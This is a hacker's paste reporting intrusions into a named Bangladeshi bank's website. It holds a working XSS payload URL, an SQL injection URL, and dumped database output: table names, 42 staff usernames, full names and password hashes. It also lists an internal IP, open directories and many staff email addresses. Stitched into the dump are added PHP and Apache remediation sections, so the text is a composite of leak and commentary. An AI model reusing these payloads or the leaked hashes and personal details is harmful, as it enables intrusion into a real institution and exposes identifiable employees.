human_mind_cracker

report2: bangladesh bank

Oct 28th, 2012
**********************************************************************************************

[*] Target: www.islamibankbd.com

[**] Cross-site Scripting:

http://www.islamibankbd.com/feedback/feedback_action.php?email&subject&body&country=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E

(works on Mozilla Firefox)

[**] SQL injection:

http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
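Both findings above come down to untrusted request input reaching SQL and HTML unencoded: a stray quote in `BrDtlsID` alters the query, and a `country` value beginning with `">` closes an attribute and injects markup. The following is an added example, not the bank's code or the reporter's, showing the weak pattern each URL implies beside a hardened form in PHP (the site's pages are `.php`). The table name `branchdtls`, the `users` table and the column names come from the dump further down; the function names, the feedback form markup and the surrounding structure are assumptions.

```php
<?php
// Added example, not the site's own code. Hypothetical branchDetail.php and
// feedback_action.php fragments sketched from what the report's URLs imply.
declare(strict_types=1);

// Raise database errors as exceptions and keep them out of the response body;
// an SQL error echoed to the visitor is what makes BrDtlsID=60' observable.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
ini_set('display_errors', '0');

// ---- SQL injection (branchDetail.php?BrDtlsID=60') -------------------------

// Weak form: the raw query-string value is spliced into the statement, so a
// quote and anything after it become part of the SQL text.
function branchDetailWeak(mysqli $db, array $get): ?array
{
    $sql = 'SELECT * FROM branchdtls WHERE BrDtlsID = ' . $get['BrDtlsID'];
    $row = $db->query($sql)->fetch_assoc();
    return $row ?: null;
}

// Hardened form: validate the type up front, then bind the value as a
// parameter so MySQL receives it as data, never as SQL text.
function branchDetail(mysqli $db, array $get): ?array
{
    $id = filter_var($get['BrDtlsID'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM branchdtls WHERE BrDtlsID = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// ---- Reflected XSS (feedback_action.php?country=...) -----------------------

// Weak form: the submitted value is echoed into an attribute unencoded.
function countryFieldWeak(array $get): string
{
    return '<input name="country" value="' . ($get['country'] ?? '') . '">';
}

// Hardened form: encode for the HTML attribute context. ENT_QUOTES covers the
// double quote that would otherwise terminate the attribute.
function countryField(array $get): string
{
    $country = htmlspecialchars((string) ($get['country'] ?? ''),
                                ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input name="country" value="' . $country . '">';
}

// ---- Credential storage (users.Password) -----------------------------------

// The dumped Password column holds 32-character hex strings, the shape of a
// fast, unsalted digest. password_hash() stores a salted, slow hash that is
// checked with password_verify() without ever reversing it.
function storePassword(mysqli $db, int $userId, string $plain): void
{
    $hash = password_hash($plain, PASSWORD_DEFAULT);
    $stmt = $db->prepare('UPDATE users SET Password = ? WHERE UserID = ?');
    $stmt->bind_param('si', $hash, $userId);
    $stmt->execute();
    $stmt->close();
}

function checkPassword(string $storedHash, string $plain): bool
{
    return password_verify($plain, $storedHash);
}
```

The two `*Weak` functions exist only to show the contrast and have no place in a deployed page. The hardened `branchDetail()` rejects anything that is not a positive integer before the database is touched, so a malformed id produces a 400 rather than a database error message, which is also the cheapest way to stop this class of probing from showing up in the response at all.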

[****] Information Leaked from their database:

database: MySQL

[*] Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'

available databases [2]:
[*] information_schema
[*] islamidb

Database: islamidb
[74 tables]
+--------------------------+
| annualreport |
| ar_cat |
| area |
| articles |
| atm |
| atm_area |
| atm_location |
| audit_committee |
| board_of_directors |
| books |
| branchdtls |
| branches |
| chairman_corner |
| charge_commision |
| corporate_info |
| currencyrate |
| currencyrate0 |
| deposit_scheme |
| deposit_scheme_info |
| dept |
| disclosure |
| district |
| download |
| dynamicsections |
| email |
| eventdetails |
| eventdetails_11 |
| eventdetails_111 |
| events |
| executive_committee |
| feb_aof_info |
| feb_crsp_info |
| feb_csc_info |
| feb_nrb_info |
| feb_rema_info |
| feb_repa_info |
| fex_graph |
| interview |
| investment |
| jobcategory |
| jobdetails |
| keypersonal |
| link |
| link_cat |
| management |
| managementdetails |
| manager_info |
| md_corner |
| md_news |
| md_publication |
| news |
| notice |
| orderby |
| orderplacement |
| paidup_capital |
| personnel |
| photo_album |
| price_sensative_headline |
| privilege |
| profit_rate |
| publication |
| qryjobs |
| rds_perform_details |
| rds_perform_heading |
| shariahcouncil |
| shariahdetails |
| sme_info |
| sme_prd_info |
| sme_zone |
| sponsors |
| sysvalues |
| userrights |
| users |
| video |
+--------------------------+

Database: islamidb
Table: users
[13 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| Address     | varchar(50)  |
| BranchName  | varchar(50)  |
| Depertment  | varchar(50)  |
| Designation | varchar(50)  |
| Email       | varchar(50)  |
| FullName    | varchar(50)  |
| IsActive    | tinyint(4)   |
| Mobile      | varchar(50)  |
| Password    | varchar(255) |
| Phone       | varchar(50)  |
| UserID      | int(11)      |
| UserName    | varchar(50)  |
| UserType    | char(1)      |
+-------------+--------------+

Database: islamidb
Table: users
[42 entries]
+------------------+
| UserName |
+------------------+
| atmadmin |
| atmimran |
| bcdadmin |
| bcdraquib |
| borhan |
| bpmdadmin |
| bpmdnizam |
| bpmdsaiful |
| bsadmin |
| bsahashan |
| bsfoysal |
| chairmanadmin |
| chairmanuser |
| dsd |
| ecsdadmin |
| ecsdjahangir |
| fadadmin |
| fadshaheduzzaman |
| hrdabrar |
| hrdadmin |
| hrdahsan |
| hrdmaquddus |
| ibwadmin |
| ibwmonir |
| ictdwebadmin |
| khademibw |
| mdsadmin |
| mdsmohtasim |
| mkamal |
| prdadmin |
| prdhumayan |
| rcidadmin |
| rddadmin |
| rddmashiul |
| rddthohid |
| rdsadmin |
| rdsuser |
| shaheduzzaman |
| shareadmin |
| sharerozaer |
| shariahadmin |
| shariahhabib |
+------------------+

Database: islamidb
Table: users
[42 entries]
+-------------------------------+
| FullName |
+-------------------------------+
| Admin of HRD |
| Ahsan Habib |
| Habibur Rahman |
| Humayan Rashid |
| Imran |
| Ismail |
| Jahangir Hossain |
| Md. Atiqur Rahman khan Khadem |
| Md. Borhan Uddin |
| Md. Mashiul Alam |
| Md. Mostofa Kamal |
| Mohammd Thohidul Islam |
| Muhammad Abdul Quddus |
| Omar Foysal |
| Qazi Mohammed Shamsul Abrar |
| Rozaer Hossain |
| S M Abdur Raquib |
| Saiful Islam |
| Shaheduzzaman |
| Super Admin |
+-------------------------------+

Database: islamidb
Table: users
[42 entries]
+----------------------------------+
| Password |
+----------------------------------+
| 01e8565004e20ebaaee5d1e948cc0f03 |
| 04dcef1b1d1ffff2a2c1f6f31e42348a |
| 0d308e5cfbb51143225b884c2d56167e |
| 0ed377bde3c3a6a3b3c9b8f49c81bcac |
| 119cbed0296edd3415f73ca21d695eb4 |
| 13cf6dd79b3e7d7d398f11a567a0a1b5 |
| 178b0c400e3cbc03418ee64e7af71b6e |
| 2651cea9b74c51aacdbcc1396ce5bfb7 |
| 3d3993a6ece38d0c10b155d5facf78e7 |
| 3eeb8d98c5dba5919eaed3f93bc317e6 |
| 3fb85c9f03577600bc8ba6e2e25a44d5 |
| 46f1eeae56bdf1077e1890cf8c8384a3 |
| 48cda072801bb304a08aaa19cae8ece6 |
| 4c1f0b5771136bf504f8d72144fc0972 |
| 5135cebb53ab8a028f9d16d48ca9f5f5 |
| 6013ee7dc437d4b10b211110ebeb5dc4 |
| 639aa761eb8cdaaf132c98460c3a92be |
| 641e4550176313cfcb7004dc6657c54c |
| 731c4cece807f681524eeb3c00c075c8 |
| 738a639acd1502c515d2ba9a980162e8 |
| 7e242f8c51fdb0b1a754bcdec21d0532 |
| 806938e17a140d0a2847c6d4a7e88e8c |
| 8336f298fed5901d2c58c4c3a0be0522 |
| 86d7ffa824672126bd183a8961d95a1e |
| 8e099fb1fd7804e63e29ca180853f1a3 |
| 9e044b89f318c8848d18ad0f8a64d309 |
| 9f6b071e1e1c75a380a99972fd1d6c87 |
| a06ea6415499e6fc813cdb756da9fdb6 |
| b31d1d300bd4d9438a59169c08535682 |
| bd06b23acb9d8f84149500333cc1c7cc |
| bd596577eefdf3a60b314512035d7de8 |
| bed407e0a32fdd46b71722c11991d9c3 |
| cca35a0265721f5ab431821a745056af |
| d6dec0fde9d68bb607d25b84d45059f0 |
| da1f2fbf9b96c7160869c785b8de4bd6 |
| da7c5f47b4c492545aa55ec5887989a1 |
| db502e13cc0ad9b22440223c095bcdaf |
| e2e796c8d2f15e6eeae1498e063996d1 |
| ecdc03a40c52f1a387cb44ddf5740e5d |
| f099cd5a70853ec7de964fdbb7027bb9 |
| f28d90f403abe8c509aca6bd73930e8f |
| f3c94f7cece18ac86ede31265f24a2e7 |
+----------------------------------+

[**] Directory Listing Enabled:

Directory listings let an attacker build a better understanding of the server and the application's structure. In some situations a listing reveals resources that were not meant to be discoverable.

[-] solution: Disable directory listings.

url: http://www.islamibankbd.com/upload_dir/photo_album/
url: http://www.islamibankbd.com/upload_dir/newsimages/
url: http://www.islamibankbd.com/feedback/
url: http://www.islamibankbd.com/upload_dir/photo_album/thumb/
url: http://www.islamibankbd.com/upload_dir/fex_graph/
url: http://www.islamibankbd.com/upload_dir/fex_graph/sym00/
url: http://www.islamibankbd.com/feedback/images/

[**] IP Disclosure:

The server or application disclosed internal network information. An attacker could use it to make an educated guess about the internal or external network topology, and a leaked internal address can serve as a stepping stone to more complex attacks.

[-] solution: Ensure that sensitive information such as internal or external IP addresses is kept private. Unless there is a good reason to expose it, prevent the disclosure of network information.

ip: 192.168.0.69
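Both of these findings are web-server configuration issues rather than application bugs. The fragment below is an added example, not the site's configuration: the report does not say which web server is in use, so Apache httpd and a document root of /var/www/islamibankbd are assumptions, and the report does not say where the internal address appeared, so the ServerName lines address only one common cause (a self-referencing redirect built from the server's own address when no ServerName is set).

```apache
# Added example, not the site's own configuration. Assumes Apache httpd with
# the site's document root at /var/www/islamibankbd (both assumptions).

# Weak form, what the listed /upload_dir/ and /feedback/ URLs behave like:
# an index page is generated for any directory without an index file.
#<Directory "/var/www/islamibankbd/upload_dir">
#    Options +Indexes
#</Directory>

# Hardened form: no auto-generated listings anywhere under the document root,
# so the directories named in the report return 403 instead of a file list.
<Directory "/var/www/islamibankbd">
    Options -Indexes
</Directory>

# Information disclosure: give the server its public name so self-referencing
# redirects are not built from an internal address, and keep version and
# signature text out of server-generated error pages.
ServerName www.islamibankbd.com
UseCanonicalName Off
ServerTokens Prod
ServerSignature Off
```

After reloading the server, requesting each of the seven URLs above should produce a 403 with no file list in the body; that is the quickest check that the change actually covered every directory the report names, including the nested thumb/ and sym00/ paths, which inherit the setting from the document-root block.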

[**] Email leaked:

email: info@islamibankbd.com
email: hocc@islamibankbd.com
email: uttara@islamibankbd.com
email: agrabad@islamibankbd.com
email: ibblac@bttb.net.bd
email: dhakacentral@islamibankbd.com
email: dhanmondi@islamibankbd.com
email: elephantroad@islamibankbd.com
email: farmgate@islamibankbd.com
email: idbbhaban@islamibankbd.com
email: kawran@islamibankbd.com
email: khilgaon@islamibankbd.com
email: mogbazar@islamibankbd.com
email: motijheel@islamibankbd.com
email: mouchak@islamibankbd.com
email: newmarket@islamibankbd.com
email: paltan@islamibankbd.com
email: panthapath@islamibankbd.com
email: ramna@islamibankbd.com
email: rampura@islamibankbd.com
email: viproad@islamibankbd.com
email: mannan@islamibankbd.com
email: shaque@islamibankbd.com
email: mhr@islamibankbd.com
email: mnislam@islamibankbd.com
email: hrbhuiyan@islamibankbd.com
email: sadeq@islamibankbd.com
email: imrislam@yahoo.com
email: mdnajibur@gmail.com
email: kabir0136@islamibankbd.com
email: dhakanorth@islamibankbd.com
email: dhakasouth@islamibankbd.com
email: cmb@islamibankbd.com
email: ctgnorth@islamibankbd.com
email: nasir106@islamibankbd.com
email: moula131@yahoo.com
email: khatunganj@islamibankbd.com
email: abdulnaser@yahoo.com
email: admin.portal@islamibankbd.com
email: majhar@islamibankbd.com
email: barisalzone@islamibankbd.com
email: barguna@islamibankbd.com
email: barisal@islamibankbd.com
email: Bhandaria@islamibankbd.com
email: bhola@islamibankbd.com
email: charfashion@islamibankbd.com
email: damodya@islamibankbd.com
email: faridpur@islamibankbd.com
email: gopalgonj@islamibankbd.com
email: hatkhola@islamibankbd.com
email: jhalokathi@islamibankbd.com
email: madaripur@islamibankbd.com
email: miarhat@islamibankbd.com
email: naria@islamibankbd.com
email: patuakhali@islamibankbd.com
email: pirojpur@islamibankbd.com
email: rajbari@islamibankbd.com
email: shariatpur@islamibankbd.com
email: takerhat@islamibankbd.com
email: torki@islamibankbd.com
email: bograzone@islamibankbd.com
email: baragola@islamibankbd.com
email: belkuchi@islamibankbd.com
email: bogra@islamibankbd.com
email: joypurhat@islamibankbd.com
email: mohadevpur@islamibankbd.com
email: naogaon@islamibankbd.com
email: nazipur@islamibankbd.com
email: shapahar@islamibankbd.com
email: sirajganj@islamibankbd.com
email: ctgzone@islamibankbd.com
email: potenga@colbd.com
email: bariyarhat@islamibankbd.com
email: dewanhat@islamibankbd.com
email: fatikchari@islamibankbd.com
email: halishahar@islamibankbd.com
email: hathazari@islamibankbd.com

[****] Picture:
http://www.imagup.com/data/1166122796.html